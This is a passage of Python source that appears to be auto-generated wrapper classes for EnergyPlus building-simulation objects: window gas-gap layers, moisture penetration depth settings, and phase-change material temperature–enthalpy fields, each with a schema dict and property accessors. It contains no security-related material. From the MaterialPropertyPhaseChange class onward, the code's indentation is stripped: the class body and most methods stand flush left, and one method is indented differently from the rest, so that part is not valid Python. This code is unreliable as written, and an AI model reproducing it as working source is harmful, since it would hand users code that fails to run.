                                       {'name': u'Specific Heat Coefficient C',
                                        'pyname': u'specific_heat_coefficient_c',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'J/kg-K3'}),
                                      (u'molecular weight',
                                       {'name': u'Molecular Weight',
                                        'pyname': u'molecular_weight',
                                        'maximum': 200.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 20.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'g/mol'}),
                                      (u'specific heat ratio',
                                       {'name': u'Specific Heat Ratio',
                                        'pyname': u'specific_heat_ratio',
                                        'minimum>': 1.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real'})]),
               'format': None,
               'group': u'Surface Construction Elements',
               'min-fields': 3,
               'name': u'WindowMaterial:Gap:EquivalentLayer',
               'pyname': u'WindowMaterialGapEquivalentLayer',
               'required-object': False,
               'unique-object': False}

    # Each property below is a thin accessor pair over DataObject's
    # dict-style storage, keyed by the IDD field name from _schema.

    @property
    def name(self):
        """field `Name`

        Args:
            value (str): value for IDD Field `Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `name` or None if not set
        """
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Corresponds to IDD field `Name`"""
        self["Name"] = value

    @property
    def gas_type(self):
        """field `Gas Type`

        Args:
            value (str): value for IDD Field `Gas Type`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `gas_type` or None if not set
        """
        return self["Gas Type"]

    @gas_type.setter
    def gas_type(self, value=None):
        """Corresponds to IDD field `Gas Type`"""
        self["Gas Type"] = value

    @property
    def thickness(self):
        """field `Thickness`

        |  Units: m
        |  IP-Units: in

        Args:
            value (float): value for IDD Field `Thickness`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `thickness` or None if not set
        """
        return self["Thickness"]

    @thickness.setter
    def thickness(self, value=None):
        """Corresponds to IDD field `Thickness`"""
        self["Thickness"] = value

    @property
    def gap_vent_type(self):
        """field `Gap Vent Type`

        |  Sealed means the gap is enclosed and gas tight, i.e., no venting to indoor or
        |  outdoor environment. VentedIndoor means the gap is vented to indoor environment, and
        |  VentedOutdoor means the gap is vented to the outdoor environment. The gap types
        |  VentedIndoor and VentedOutdoor are used with gas type "Air" only.

        Args:
            value (str): value for IDD Field `Gap Vent Type`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `gap_vent_type` or None if not set
        """
        return self["Gap Vent Type"]

    @gap_vent_type.setter
    def gap_vent_type(self, value=None):
        """Corresponds to IDD field `Gap Vent Type`"""
        self["Gap Vent Type"] = value

    @property
    def conductivity_coefficient_a(self):
        """field `Conductivity Coefficient A`

        |  Used only if Gas Type = Custom
        |  Units: W/m-K

        Args:
            value (float): value for IDD Field `Conductivity Coefficient A`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `conductivity_coefficient_a` or None if not set
        """
        return self["Conductivity Coefficient A"]

    @conductivity_coefficient_a.setter
    def conductivity_coefficient_a(self, value=None):
        """Corresponds to IDD field `Conductivity Coefficient A`"""
        self["Conductivity Coefficient A"] = value

    @property
    def conductivity_coefficient_b(self):
        """field `Conductivity Coefficient B`

        |  Used only if Gas Type = Custom
        |  Units: W/m-K2

        Args:
            value (float): value for IDD Field `Conductivity Coefficient B`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `conductivity_coefficient_b` or None if not set
        """
        return self["Conductivity Coefficient B"]

    @conductivity_coefficient_b.setter
    def conductivity_coefficient_b(self, value=None):
        """Corresponds to IDD field `Conductivity Coefficient B`"""
        self["Conductivity Coefficient B"] = value

    @property
    def conductivity_coefficient_c(self):
        """field `Conductivity Coefficient C`

        |  Used only if Gas Type = Custom
        |  Units: W/m-K3

        Args:
            value (float): value for IDD Field `Conductivity Coefficient C`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `conductivity_coefficient_c` or None if not set
        """
        return self["Conductivity Coefficient C"]

    @conductivity_coefficient_c.setter
    def conductivity_coefficient_c(self, value=None):
        """Corresponds to IDD field `Conductivity Coefficient C`"""
        self["Conductivity Coefficient C"] = value

    @property
    def viscosity_coefficient_a(self):
        """field `Viscosity Coefficient A`

        |  Used only if Gas Type = Custom
        |  Units: kg/m-s

        Args:
            value (float): value for IDD Field `Viscosity Coefficient A`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `viscosity_coefficient_a` or None if not set
        """
        return self["Viscosity Coefficient A"]

    @viscosity_coefficient_a.setter
    def viscosity_coefficient_a(self, value=None):
        """Corresponds to IDD field `Viscosity Coefficient A`"""
        self["Viscosity Coefficient A"] = value

    @property
    def viscosity_coefficient_b(self):
        """field `Viscosity Coefficient B`

        |  Used only if Gas Type = Custom
        |  Units: kg/m-s-K

        Args:
            value (float): value for IDD Field `Viscosity Coefficient B`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `viscosity_coefficient_b` or None if not set
        """
        return self["Viscosity Coefficient B"]

    @viscosity_coefficient_b.setter
    def viscosity_coefficient_b(self, value=None):
        """Corresponds to IDD field `Viscosity Coefficient B`"""
        self["Viscosity Coefficient B"] = value

    @property
    def viscosity_coefficient_c(self):
        """field `Viscosity Coefficient C`

        |  Used only if Gas Type = Custom
        |  Units: kg/m-s-K2

        Args:
            value (float): value for IDD Field `Viscosity Coefficient C`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `viscosity_coefficient_c` or None if not set
        """
        return self["Viscosity Coefficient C"]

    @viscosity_coefficient_c.setter
    def viscosity_coefficient_c(self, value=None):
        """Corresponds to IDD field `Viscosity Coefficient C`"""
        self["Viscosity Coefficient C"] = value

    @property
    def specific_heat_coefficient_a(self):
        """field `Specific Heat Coefficient A`

        |  Used only if Gas Type = Custom
        |  Units: J/kg-K

        Args:
            value (float): value for IDD Field `Specific Heat Coefficient A`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `specific_heat_coefficient_a` or None if not set
        """
        return self["Specific Heat Coefficient A"]

    @specific_heat_coefficient_a.setter
    def specific_heat_coefficient_a(self, value=None):
        """Corresponds to IDD field `Specific Heat Coefficient A`"""
        self["Specific Heat Coefficient A"] = value

    @property
    def specific_heat_coefficient_b(self):
        """field `Specific Heat Coefficient B`

        |  Used only if Gas Type = Custom
        |  Units: J/kg-K2

        Args:
            value (float): value for IDD Field `Specific Heat Coefficient B`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `specific_heat_coefficient_b` or None if not set
        """
        return self["Specific Heat Coefficient B"]

    @specific_heat_coefficient_b.setter
    def specific_heat_coefficient_b(self, value=None):
        """Corresponds to IDD field `Specific Heat Coefficient B`"""
        self["Specific Heat Coefficient B"] = value

    @property
    def specific_heat_coefficient_c(self):
        """field `Specific Heat Coefficient C`

        |  Used only if Gas Type = Custom
        |  Units: J/kg-K3

        Args:
            value (float): value for IDD Field `Specific Heat Coefficient C`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `specific_heat_coefficient_c` or None if not set
        """
        return self["Specific Heat Coefficient C"]

    @specific_heat_coefficient_c.setter
    def specific_heat_coefficient_c(self, value=None):
        """Corresponds to IDD field `Specific Heat Coefficient C`"""
        self["Specific Heat Coefficient C"] = value

    @property
    def molecular_weight(self):
        """field `Molecular Weight`

        |  Used only if Gas Type = Custom
        |  Units: g/mol
        |  value >= 20.0
        |  value <= 200.0

        Args:
            value (float): value for IDD Field `Molecular Weight`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `molecular_weight` or None if not set
        """
        return self["Molecular Weight"]

    @molecular_weight.setter
    def molecular_weight(self, value=None):
        """Corresponds to IDD field `Molecular Weight`"""
        self["Molecular Weight"] = value

    @property
    def specific_heat_ratio(self):
        """field `Specific Heat Ratio`

        |  Used only if Gas Type = Custom
        |  value > 1.0

        Args:
            value (float): value for IDD Field `Specific Heat Ratio`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `specific_heat_ratio` or None if not set
        """
        return self["Specific Heat Ratio"]

    @specific_heat_ratio.setter
    def specific_heat_ratio(self, value=None):
        """Corresponds to IDD field `Specific Heat Ratio`"""
        self["Specific Heat Ratio"] = value
class MaterialPropertyMoisturePenetrationDepthSettings(DataObject):

    """ Corresponds to IDD object `MaterialProperty:MoisturePenetrationDepth:Settings`
        Additional properties for moisture using EMPD procedure
        HeatBalanceAlgorithm choice=MoisturePenetrationDepthConductionTransferFunction only
        Has no effect with other HeatBalanceAlgorithm solution algorithms
    """
    # IDD metadata consumed by the DataObject base class for field lookup,
    # validation and serialization. NOTE(review): OrderedDict ordering mirrors
    # the IDD field order and is significant — do not reorder entries.
    _schema = {'extensible-fields': OrderedDict(),
               'fields': OrderedDict([(u'name',
                                       {'name': u'Name',
                                        'pyname': u'name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'moisture penetration depth',
                                       {'name': u'Moisture Penetration Depth',
                                        'pyname': u'moisture_penetration_depth',
                                        'required-field': True,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm'}),
                                      (u'moisture equation coefficient a',
                                       {'name': u'Moisture Equation Coefficient a',
                                        'pyname': u'moisture_equation_coefficient_a',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'}),
                                      (u'moisture equation coefficient b',
                                       {'name': u'Moisture Equation Coefficient b',
                                        'pyname': u'moisture_equation_coefficient_b',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'}),
                                      (u'moisture equation coefficient c',
                                       {'name': u'Moisture Equation Coefficient c',
                                        'pyname': u'moisture_equation_coefficient_c',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'}),
                                      (u'moisture equation coefficient d',
                                       {'name': u'Moisture Equation Coefficient d',
                                        'pyname': u'moisture_equation_coefficient_d',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'dimensionless'})]),
               'format': None,
               'group': u'Surface Construction Elements',
               'min-fields': 0,
               'name': u'MaterialProperty:MoisturePenetrationDepth:Settings',
               'pyname': u'MaterialPropertyMoisturePenetrationDepthSettings',
               'required-object': False,
               'unique-object': False}

    # Each property below is a thin accessor pair over DataObject's
    # dict-style storage, keyed by the IDD field name from _schema.

    @property
    def name(self):
        """field `Name`

        |  Material Name that the moisture properties will be added to.
        |  Additional material properties required to perform the EMPD model.
        |  Effective Mean Penetration Depth (EMPD)

        Args:
            value (str): value for IDD Field `Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `name` or None if not set
        """
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Corresponds to IDD field `Name`"""
        self["Name"] = value

    @property
    def moisture_penetration_depth(self):
        """field `Moisture Penetration Depth`

        |  This is the penetration depth
        |  Units: m

        Args:
            value (float): value for IDD Field `Moisture Penetration Depth`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `moisture_penetration_depth` or None if not set
        """
        return self["Moisture Penetration Depth"]

    @moisture_penetration_depth.setter
    def moisture_penetration_depth(self, value=None):
        """Corresponds to IDD field `Moisture Penetration Depth`"""
        self["Moisture Penetration Depth"] = value

    @property
    def moisture_equation_coefficient_a(self):
        """field `Moisture Equation Coefficient a`

        |  Units: dimensionless

        Args:
            value (float): value for IDD Field `Moisture Equation Coefficient a`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `moisture_equation_coefficient_a` or None if not set
        """
        return self["Moisture Equation Coefficient a"]

    @moisture_equation_coefficient_a.setter
    def moisture_equation_coefficient_a(self, value=None):
        """Corresponds to IDD field `Moisture Equation Coefficient a`"""
        self["Moisture Equation Coefficient a"] = value

    @property
    def moisture_equation_coefficient_b(self):
        """field `Moisture Equation Coefficient b`

        |  Units: dimensionless

        Args:
            value (float): value for IDD Field `Moisture Equation Coefficient b`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `moisture_equation_coefficient_b` or None if not set
        """
        return self["Moisture Equation Coefficient b"]

    @moisture_equation_coefficient_b.setter
    def moisture_equation_coefficient_b(self, value=None):
        """Corresponds to IDD field `Moisture Equation Coefficient b`"""
        self["Moisture Equation Coefficient b"] = value

    @property
    def moisture_equation_coefficient_c(self):
        """field `Moisture Equation Coefficient c`

        |  Units: dimensionless

        Args:
            value (float): value for IDD Field `Moisture Equation Coefficient c`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `moisture_equation_coefficient_c` or None if not set
        """
        return self["Moisture Equation Coefficient c"]

    @moisture_equation_coefficient_c.setter
    def moisture_equation_coefficient_c(self, value=None):
        """Corresponds to IDD field `Moisture Equation Coefficient c`"""
        self["Moisture Equation Coefficient c"] = value

    @property
    def moisture_equation_coefficient_d(self):
        """field `Moisture Equation Coefficient d`

        |  Units: dimensionless

        Args:
            value (float): value for IDD Field `Moisture Equation Coefficient d`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `moisture_equation_coefficient_d` or None if not set
        """
        return self["Moisture Equation Coefficient d"]

    @moisture_equation_coefficient_d.setter
    def moisture_equation_coefficient_d(self, value=None):
        """Corresponds to IDD field `Moisture Equation Coefficient d`"""
        self["Moisture Equation Coefficient d"] = value
class MaterialPropertyPhaseChange(DataObject):
""" Corresponds to IDD object `MaterialProperty:PhaseChange`
Additional properties for temperature dependent thermal conductivity
and enthalpy for Phase Change Materials (PCM)
HeatBalanceAlgorithm = CondFD(ConductionFiniteDifference) solution algorithm only.
Constructions with this should use the detailed CondFD process.
Has no effect with other HeatBalanceAlgorithm solution algorithms
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'temperature coefficient for thermal conductivity',
{'name': u'Temperature Coefficient for Thermal Conductivity',
'pyname': u'temperature_coefficient_for_thermal_conductivity',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m-K2'}),
(u'temperature 1',
{'name': u'Temperature 1',
'pyname': u'temperature_1',
'default': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'enthalpy 1',
{'name': u'Enthalpy 1',
'pyname': u'enthalpy_1',
'default': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'J/kg'}),
(u'temperature 2',
{'name': u'Temperature 2',
'pyname': u'temperature_2',
'default': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'enthalpy 2',
{'name': u'Enthalpy 2',
'pyname': u'enthalpy_2',
'default': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg'}),
(u'temperature 3',
{'name': u'Temperature 3',
'pyname': u'temperature_3',
'default': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'enthalpy 3',
{'name': u'Enthalpy 3',
'pyname': u'enthalpy_3',
'default': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg'}),
(u'temperature 4',
{'name': u'Temperature 4',
'pyname': u'temperature_4',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'enthalpy 4',
{'name': u'Enthalpy 4',
'pyname': u'enthalpy_4',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg'}),
(u'temperature 5',
{'name': u'Temperature 5',
'pyname': u'temperature_5',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'enthalpy 5',
{'name': u'Enthalpy 5',
'pyname': u'enthalpy_5',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg'}),
(u'temperature 6',
{'name': u'Temperature 6',
'pyname': u'temperature_6',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'enthalpy 6',
{'name': u'Enthalpy 6',
'pyname': u'enthalpy_6',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg'}),
(u'temperature 7',
{'name': u'Temperature 7',
'pyname': u'temperature_7',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'enthalpy 7',
{'name': u'Enthalpy 7',
'pyname': u'enthalpy_7',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg'}),
(u'temperature 8',
{'name': u'Temperature 8',
'pyname': u'temperature_8',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'enthalpy 8',
{'name': u'Enthalpy 8',
'pyname': u'enthalpy_8',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg'}),
(u'temperature 9',
{'name': u'Temperature 9',
'pyname': u'temperature_9',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'enthalpy 9',
{'name': u'Enthalpy 9',
'pyname': u'enthalpy_9',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'J/kg'}),
(u'temperature 10',
{'name': u'Temperature 10',
'pyname': u'temperature_10',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'enthalpy 10',
{'name': u'Enthalpy 10',
'pyname': u'enthalpy_10',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg'}),
(u'temperature 11',
{'name': u'Temperature 11',
'pyname': u'temperature_11',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'enthalpy 11',
{'name': u'Enthalpy 11',
'pyname': u'enthalpy_11',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg'}),
(u'temperature 12',
{'name': u'Temperature 12',
'pyname': u'temperature_12',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'enthalpy 12',
{'name': u'Enthalpy 12',
'pyname': u'enthalpy_12',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg'}),
(u'temperature 13',
{'name': u'Temperature 13',
'pyname': u'temperature_13',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'enthalpy 13',
{'name': u'Enthalpy 13',
'pyname': u'enthalpy_13',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg'}),
(u'temperature 14',
{'name': u'Temperature 14',
'pyname': u'temperature_14',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'enthalpy 14',
{'name': u'Enthalpy 14',
'pyname': u'enthalpy_14',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg'}),
(u'temperature 15',
{'name': u'Temperature 15',
'pyname': u'temperature_15',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'enthalpy 15',
{'name': u'Enthalpy 15',
'pyname': u'enthalpy_15',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg'}),
(u'temperature 16',
{'name': u'Temperature 16',
'pyname': u'temperature_16',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'enthalpy 16',
{'name': u'Enthalpy 16',
'pyname': u'enthalpy_16',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 0,
'name': u'MaterialProperty:PhaseChange',
'pyname': u'MaterialPropertyPhaseChange',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
| Regular Material Name to which the additional properties will be added.
| this the material name for the basic material properties.
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def temperature_coefficient_for_thermal_conductivity(self):
"""field `Temperature Coefficient for Thermal Conductivity`
| The base temperature is 20C.
| This is the thermal conductivity change per degree excursion from 20C.
| This variable conductivity function is overridden by the VariableThermalConductivity object, if present.
| Units: W/m-K2
Args:
value (float): value for IDD Field `Temperature Coefficient for Thermal Conductivity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_coefficient_for_thermal_conductivity` or None if not set
"""
return self["Temperature Coefficient for Thermal Conductivity"]
@temperature_coefficient_for_thermal_conductivity.setter
def temperature_coefficient_for_thermal_conductivity(self, value=None):
"""Corresponds to IDD field `Temperature Coefficient for Thermal
Conductivity`"""
self["Temperature Coefficient for Thermal Conductivity"] = value
@property
def temperature_1(self):
"""field `Temperature 1`
| for Temperature-enthalpy function
| Units: C
Args:
value (float): value for IDD Field `Temperature 1`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_1` or None if not set
"""
return self["Temperature 1"]
@temperature_1.setter
def temperature_1(self, value=None):
"""Corresponds to IDD field `Temperature 1`"""
self["Temperature 1"] = value
@property
def enthalpy_1(self):
"""field `Enthalpy 1`
| for Temperature-enthalpy function corresponding to temperature 1
| Units: J/kg
Args:
value (float): value for IDD Field `Enthalpy 1`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `enthalpy_1` or None if not set
"""
return self["Enthalpy 1"]
@enthalpy_1.setter
def enthalpy_1(self, value=None):
"""Corresponds to IDD field `Enthalpy 1`"""
self["Enthalpy 1"] = value
@property
def temperature_2(self):
"""field `Temperature 2`
| for Temperature-enthalpy function
| Units: C
Args:
value (float): value for IDD Field `Temperature 2`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_2` or None if not set
"""
return self["Temperature 2"]
@temperature_2.setter
def temperature_2(self, value=None):
"""Corresponds to IDD field `Temperature 2`"""
self["Temperature 2"] = value
@property
def enthalpy_2(self):
"""field `Enthalpy 2`
| for Temperature-enthalpy function corresponding to temperature 2
| Units: J/kg
Args:
value (float): value for IDD Field `Enthalpy 2`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `enthalpy_2` or None if not set
"""
return self["Enthalpy 2"]
@enthalpy_2.setter
def enthalpy_2(self, value=None):
"""Corresponds to IDD field `Enthalpy 2`"""
self["Enthalpy 2"] = value
@property
def temperature_3(self):
"""field `Temperature 3`
| for Temperature-enthalpy function
| Units: C
Args:
value (float): value for IDD Field `Temperature 3`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_3` or None if not set
"""
return self["Temperature 3"]
@temperature_3.setter
def temperature_3(self, value=None):
"""Corresponds to IDD field `Temperature 3`"""
self["Temperature 3"] = value
@property
def enthalpy_3(self):
"""field `Enthalpy 3`
| for Temperature-enthalpy function corresponding to temperature 3
| Units: J/kg
Args:
value (float): value for IDD Field `Enthalpy 3`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `enthalpy_3` or None if not set
"""
return self["Enthalpy 3"]
@enthalpy_3.setter
def enthalpy_3(self, value=None):
"""Corresponds to IDD field `Enthalpy 3`"""
self["Enthalpy 3"] = value
@property
def temperature_4(self):
"""field `Temperature 4`
| for Temperature-enthalpy function
| Units: C
Args:
value (float): value for IDD Field `Temperature 4`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_4` or None if not set
"""
return self["Temperature 4"]
@temperature_4.setter
def temperature_4(self, value=None):
"""Corresponds to IDD field `Temperature 4`"""
self["Temperature 4"] = value
@property
def enthalpy_4(self):
"""field `Enthalpy 4`
| for Temperature-enthalpy function corresponding to temperature 4
| Units: J/kg
Args:
value (float): value for IDD Field `Enthalpy 4`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `enthalpy_4` or None if not set
"""
return self["Enthalpy 4"]
@enthalpy_4.setter
def enthalpy_4(self, value=None):
"""Corresponds to IDD field `Enthalpy 4`"""
self["Enthalpy 4"] = value
@property
def temperature_5(self):
"""field `Temperature 5`
| for Temperature-enthalpy function
| Units: C
Args:
value (float): value for IDD Field `Temperature 5`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_5` or None if not set
"""
return self["Temperature 5"]
@temperature_5.setter
def temperature_5(self, value=None):
"""Corresponds to IDD field `Temperature 5`"""
self["Temperature 5"] = value
@property
def enthalpy_5(self):
"""field `Enthalpy 5`
| for Temperature-enthalpy function corresponding to temperature 5
| Units: J/kg
Args:
value (float): value for IDD Field `Enthalpy 5`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `enthalpy_5` or None if not set
"""
return self["Enthalpy 5"]
@enthalpy_5.setter
def enthalpy_5(self, value=None):
"""Corresponds to IDD field `Enthalpy 5`"""
self["Enthalpy 5"] = value
@property
def temperature_6(self):
"""field `Temperature 6`
| for Temperature-enthalpy function
| Units: C
Args:
value (float): value for IDD Field `Temperature 6`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_6` or None if not set
"""
return self["Temperature 6"]
@temperature_6.setter
def temperature_6(self, value=None):
"""Corresponds to IDD field `Temperature 6`"""
self["Temperature 6"] = value
@property
def enthalpy_6(self):
"""field `Enthalpy 6`
| for Temperature-enthalpy function corresponding to temperature 6
| Units: J/kg
Args:
value (float): value for IDD Field `Enthalpy 6`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `enthalpy_6` or None if not set
"""
return self["Enthalpy 6"]
@enthalpy_6.setter
def enthalpy_6(self, value=None):
"""Corresponds to IDD field `Enthalpy 6`"""
self["Enthalpy 6"] = value
@property
def temperature_7(self):
"""field `Temperature 7`
| for Temperature-enthalpy function
| Units: C
Args:
value (float): value for IDD Field `Temperature 7`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_7` or None if not set
"""
return self["Temperature 7"]
@temperature_7.setter
def temperature_7(self, value=None):
"""Corresponds to IDD field `Temperature 7`"""
self["Temperature 7"] = value
@property
def enthalpy_7(self):
"""field `Enthalpy 7`
| for Temperature-enthalpy function corresponding to temperature 7
| Units: J/kg
Args:
value (float): value for IDD Field `Enthalpy 7`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `enthalpy_7` or None if not set
"""
return self["Enthalpy 7"]
@enthalpy_7.setter
def enthalpy_7(self, value=None):
"""Corresponds to IDD field `Enthalpy 7`"""
self["Enthalpy 7"] = value
@property
def temperature_8(self):
"""field `Temperature 8`
| for Temperature-enthalpy function
| Units: C
Args:
value (float): value for IDD Field `Temperature 8`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_8` or None if not set
"""
return self["Temperature 8"]
@temperature_8.setter
def temperature_8(self, value=None):
"""Corresponds to IDD field `Temperature 8`"""
self["Temperature 8"] = value
@property
def enthalpy_8(self):
"""field `Enthalpy 8`
| for Temperature-enthalpy function corresponding to temperature 8
| Units: J/kg
Args:
value (float): value for IDD Field `Enthalpy 8`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `enthalpy_8` or None if not set
"""
return self["Enthalpy 8"]
@enthalpy_8.setter
def enthalpy_8(self, value=None):
"""Corresponds to IDD field `Enthalpy 8`"""
self["Enthalpy 8"] = value
@property
def temperature_9(self):
"""field `Temperature 9`
| for Temperature-enthalpy function
| Units: C
Args:
value (float): value for IDD Field `Temperature 9`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_9` or None if not set
"""
return self["Temperature 9"]
@temperature_9.setter
def temperature_9(self, value=None):
"""Corresponds to IDD field `Temperature 9`"""
self["Temperature 9"] = value
@property
def enthalpy_9(self):
    """field `Enthalpy 9`

    | for Temperature-enthalpy function corresponding to temperature 9
    | Units: J/kg

    Args:
        value (float): value for IDD Field `Enthalpy 9`

    Raises:
        ValueError: if `value` is not a valid value

    Returns:
        float: the value of `enthalpy_9` or None if not set
    """
    return self["Enthalpy 9"]

@enthalpy_9.setter
def enthalpy_9(self, value=None):
    """Corresponds to IDD field `Enthalpy 9`"""
    self["Enthalpy 9"] = value
@property
def temperature_10(self):
"""field `Temperature 10`
| for Temperature-enthalpy function
| Units: C
Args:
value (float): value for IDD Field `Temperature 10`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_10` or None if not set
"""
return self["Temperature 10"]
@temperature_10.setter
def temperature_10(self, value=None):
"""Corresponds to IDD field `Temperature 10`"""
self["Temperature 10"] = value
@property
def enthalpy_10(self):
    """field `Enthalpy 10`

